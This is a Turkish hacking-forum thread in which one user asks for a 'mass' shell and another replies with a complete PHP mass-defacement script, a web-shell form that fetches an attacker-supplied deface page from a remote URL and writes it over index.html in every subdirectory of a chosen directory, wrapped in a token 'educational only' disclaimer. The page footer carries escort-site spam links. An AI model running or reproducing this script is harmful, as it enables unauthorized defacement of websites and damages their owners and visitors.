Mass atabileceğimiz shell ?

batuhank

Spys-Z
Katılım
21 May 2013
Mesajlar
836
Tepkime puanı
1
Puanları
0
Arkadaşlar mass atabileceğimiz bir shell vardı unuttum adını varsa verirseniz sevinirim
 

BaDRaN

Prof Spys-z
Katılım
31 Eki 2012
Mesajlar
1,035
Tepkime puanı
0
Puanları
0
PHP:
<?php
/*
Script: Mass Deface Script
Author: illSecure Research Group
Website: http://illsecure.com
Email: illSecResearchGroup@gmail.com
Disclaimer:
This script is for Research/Educational/Academic purposes only, 
The Author of this script takes no responsibility for the way
you use this script, you are responsible for your own actions.
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";
 
if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
                        if(filetype($dir.$file)=="dir"){
                                $newfile=$dir.$file."/index.html";
                                echo $newfile."\n";
                                if (!copy($defaceurl, $newfile)) {
                                        echo "failed to copy $file...\n";
                                }
                        }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>


<td align=right>Mass Defacement:</td><br>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></form></td>
 
 

<br><br><br>
** Main Directory = The Directory you want to mass deface (Must have read/write permission) **<br>
** Defacement Url = URL of your deface page (e.g: http://yoursite.com/deface.html ) **<br><br>
<b>** Disclaimer: <br>
This script is for Research/Educational/Academic purposes only, <br>
The Author of this script takes no responsibility for the way <br>
you use this script, you are responsible for your own actions. ** <br><b>
<br> <a href="http://illSecure.com">** Visit illSecure.com for exclusive scripts, tutorials, exploits & much more..  </a> 
</body></html>

Bunu dene kardeşim.
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012